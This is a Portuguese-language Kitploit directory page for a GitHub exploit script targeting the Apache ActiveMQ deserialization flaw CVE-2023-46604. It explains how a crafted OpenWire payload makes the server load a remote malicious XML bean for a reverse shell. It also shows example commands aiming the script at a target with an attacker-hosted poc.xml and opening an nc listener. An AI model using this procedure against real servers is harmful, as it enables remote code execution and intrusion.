Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-46604 — O script explora uma vulnerabilidade de desserialização insegura no Apache ActiveMQ (CVE-2023-46604) | Kitploit
Ferramentas/GitHubGitHub/pulentoski/cve-2023-46604
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

O script explora uma vulnerabilidade de desserialização insegura no Apache ActiveMQ (CVE-2023-46604)

Ver Repositório
113há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Resumo Técnico do Ataque: CVE-2023-46604

O script explora uma vulnerabilidade de desserialização insegura no Apache ActiveMQ (CVE-2023-46604) para obter a execução remota de código no servidor alvo. Descrição do Processo de Exploração

root@kitploit:~
Objetivo da Vulnerabilidade:
    A vulnerabilidade reside no protocolo OpenWire do Apache ActiveMQ.
    Permite a desserialização insegura de objetos, o que pode ser aproveitado para executar código arbitrário no servidor.

Pré-requisitos:
    Acesso de rede ao servidor ActiveMQ.
    Um arquivo XML malicioso (poc.xml) disponível por meio de uma URL acessível pelo servidor alvo.

Componentes do Ataque:
    Script Python: Automatiza o envio do payload malicioso ao servidor ActiveMQ.
    Arquivo XML (poc.xml): Contém um bean do Spring que define a execução de um comando malicioso (por exemplo, abrir uma shell reversa).

Passos do Ataque

root@kitploit:~
Preparação do Payload:
    O script constrói uma mensagem em hexadecimal que inclui:
        O nome da classe Java: org.springframework.context.support.ClassPathXmlApplicationContext.
        A URL do arquivo XML malicioso.
    O payload é convertido em uma sequência de bytes que pode ser enviada por meio do protocolo OpenWire.

Envio do Payload:
    O script abre uma conexão de socket TCP com o servidor ActiveMQ na porta especificada (por padrão 61616).
    Envia o payload malicioso ao servidor.

Execução do Código Malicioso:
    O servidor ActiveMQ desserializa o objeto especificado no payload.
    Devido à desserialização insegura, o bean do Spring definido no arquivo XML é carregado e executado.
    Esse bean executa um comando malicioso (por exemplo, uma shell reversa) no servidor.

    _________________________________________________________

exemplo de execução:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

este script foi copiado e modificado em espanhol:https://github.com/evkl1d/CVE-2023-46604.git

Baixar ferramenta